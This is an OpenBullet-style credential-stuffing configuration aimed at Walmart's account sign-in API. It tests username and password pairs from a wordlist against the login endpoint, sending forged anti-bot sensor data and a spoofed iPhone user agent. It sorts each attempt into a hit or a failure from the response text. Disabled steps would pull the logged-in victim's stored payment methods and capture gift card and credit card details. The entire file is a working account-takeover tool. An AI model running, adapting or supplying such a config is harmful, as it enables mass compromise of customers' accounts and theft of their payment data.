[SETTINGS]
{
  "Name": "walmart.com api new config",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-11-05T17:36:00.8142442+03:30",
  "AdditionalInfo": "",
  "Author": "@jailbroken",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#PostLogin REQUEST POST "https://www.walmart.com/account/electrode/api/signin?tid=0&returnUrl=%2F" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"rememberme\":true,\"showRememberme\":\"true\",\"captcha\":{\"sensorData\":\"2a25G2m84Vrp0o9c4157821.12-1,8,-36,-890,Mozilla/9.8 (iPhone; CPU OS 89_85_6 (Ergänzendes Update) like Mac OS X) AppleWebKit/567.5.96 (KHTML, like Gecko) Version/30.8.1 Mobile/78E111 Safari/221.3.22,uaend,07213,01720800,en-US,Gecko,8,3,0,6,936394,2484932,3001,933,8567,726,5640,324,4582,,cpen:7,i8:3,dm:2,cwen:9,non:1,opc:2,fc:1,sc:0,wrc:3,isc:43.6985148922901,vib:0,bat:8,x01:0,x11:3,53574,0.331406126331,708882386170,loc:-8,5,-80,-529,do_en,dm_en,t_dis-1,2,-93,-747,1,1,7,4,516,162,1;0,9,3,1,409,064,9;7,3,0,7,7795,7,0;0,-1,6,6,-9,-0,7;4,-0,2,4,-2,-1,0;1,1,2,5,9360,630,0;6,-5,8,8,1878,817,6;2,3,9,8,007,146,2;2,1,7,4,1022,201,7;0,0,1,0,3296,1,9;7,5,0,7,311,699,7;3,-0,2,4,-2,-1,0;2,-7,6,2,-8,-8,3;0,8,6,3,751,553,0;7,8,2,2,0124,982,2;4,8,7,1,1958,6,6;2,-8,0,0,-1,-3,4;9,-0,7,3,-0,-7,2;1,1,7,4,1391,355,7;0,-4,0,7,7741,511,0;1,1,2,5,752,590,1;0,4,4,9,8205,193,6;6,2,1,0,8833,9,2;4,0,7,1,1524,146,2;2,1,7,4,1439,201,7;0,0,1,0,4613,1,9;8,5,0,7,7834,573,0;1,9,2,5,9089,7,3;0,8,6,3,856,553,0;6,8,2,2,0633,2141,6;2,-8,0,0,3471,162,1;0,9,3,0,8280,690,0;0,1,9,3,6701,9,7;-2,1,-58,-271,7,5,1,7,162,699,7;4,2,7,7,064,780,3;0,6,6,3,2067,0,1;9,-7,2,1,-1,-4,0;7,-5,8,7,-8,-2,9;2,6,8,8,1994,923,6;2,-8,0,1,2161,463,1;9,9,3,1,313,701,9;8,5,0,7,7588,573,0;1,9,2,5,9723,7,3;0,8,6,3,848,223,0;6,-5,8,7,-8,-2,9;3,-3,1,9,-1,-1,6;6,4,1,0,385,846,6;3,3,9,8,4253,047,8;7,0,0,2,0264,2,1;9,-1,1,9,-7,-9,7;1,-4,0,6,-5,-2,9;7,5,0,7,7857,627,0;1,-7,6,3,2013,852,9;2,6,8,8,915,629,2;5,0,7,1,1618,409,2;1,9,7,4,1764,4,8;7,2,0,2,0830,701,9;8,5,0,7,7995,573,0;1,9,2,5,0140,7,3;1,8,6,3,2106,814,9;2,4,8,8,1613,0,6;6,4,1,0,480,846,6;2,3,9,8,4762,3797,1;9,-1,1,9,4027,699,7;4,2,6,6,4833,853,1;9,2,4,9,9427,3,0;-3,6,-01,-801,0,7,9499,5,0,0,629;3,6,1251,5,3,0,146;4,2,2839,-2,6,6,064;2,0,6968,-8,2,1,780;7,1,9106,-3,9,7,193;1,9,5759,-9,3,0,409;8,2,3030,-2,6,6,064;6,0,7160,-8,2,1,780;1,2,0257,-3,9,7,193;5,8,6933,-9,3,0,409;38,9,4889,-1,2,4,690;18,4,4355,58,1,7,586;11,3,9286,06,0,9,745;55,2,4033,26,6,4,064;04,2,6084,70,8,7,853;25,7,1777,86,7,7,879;70,9,2411,96,9,6,201;86,9,8736,33,2,1,780;49,0,8866,23,0,8,982;35,4,7344,19,0,6,425;-8,2,-25,-736,2,2,61,697,386;5,9,41,373,416;8,3,07,648,505;5,5,79,595,678;0,7,305,609,671;1,7,311,615,624;2,7,310,628,615;3,7,329,629,508;4,7,336,620,504;5,7,345,621,500;72,5,989,794,383;37,3,259,427,278;76,9,879,755,130;55,2,094,035,893;32,8,275,824,438;96,0,917,711,816;23,1,253,687,690;86,8,540,341,452;08,1,338,989,087;16,4,233,367,349;90,2,117,143,958;24,1,889,906,163;53,0,436,532,235;33,7,823,893,966;23,3,606,414,293;47,9,841,581,513,146;70,1,715,783,467,337;50,5,731,226,372,223;116,9,4140,770,309,784;930,4,2733,328,481,427;434,8,8841,492,231,482;575,0,3126,685,813,952;851,4,9642,406,241,982;313,0,0385,909,897,064;176,6,19390,913,335,-2;142,8,91508,763,390,-3;350,9,41804,374,507,-1;-1,8,-36,-807,-4,2,-10,-928,-8,5,-80,-527,-0,9,-04,-378,-2,1,-97,-065,6,6050;0,41761;-5,0,-84,-422,-3,6,-01,-818,194092,77904,0,1,9,2,623121,80129,7867983471494,1565344598739,40,03319,01,189,5958,0,4,91511,179227,6,irwqcb1yjqdie1yd1gpn_2709,2263,515,8740224897,80248075-1,3,-56,-387,-1,0-2,1,-58,-87,1139426254;30,83,85,26,79,7,19,30,47,7;,5;true;true;true;-848;true;55;10;true;false;2-0,4,-12,-70,5169-7,8,-75,-186,324943261-8,2,-25,-734,330142-1,3,-56,-302,;6;2;2\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 3386" 
  HEADER "content-type: application/json" 
  HEADER "DNT: 1" 
  HEADER "Host: www.walmart.com" 
  HEADER "Origin: https://www.walmart.com" 
  HEADER "Referer: https://www.walmart.com/account/login?tid=0&returnUrl=%2F" 
  HEADER "TE: Trailers" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU OS 10_15_5 (Ergänzendes Update) like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/14E304 Safari/605.1.15" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "code\":\"user_auth_fail" 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"OK\",\"" 

!#GetBillingInfo REQUEST GET "https://www.walmart.com/account/electrode/account/api/customer/:CID/payment-method" 
!  
!  HEADER "Accept: */*" 
!  HEADER "Accept-Encoding: gzip, deflate, br" 
!  HEADER "Accept-Language: en-US,en;q=0.5" 
!  HEADER "Connection: keep-alive" 
!  HEADER "Content-Length: 3386" 
!  HEADER "content-type: application/json" 
!  HEADER "DNT: 1" 
!  HEADER "Host: www.walmart.com" 
!  HEADER "Origin: https://www.walmart.com" 
!  HEADER "Referer: https://www.walmart.com/account/login?tid=0&returnUrl=%2F" 
!  HEADER "TE: Trailers" 
!  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU OS 10_15_5 (Ergänzendes Update) like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/14E304 Safari/605.1.15" 

!#giftCards PARSE "<SOURCE>" LR "\"giftCards\":[" "]" CreateEmpty=FALSE -> CAP "" 

!#creditCards PARSE "<SOURCE>" LR "\"creditCards\":[" "]" CreateEmpty=FALSE -> CAP "" 

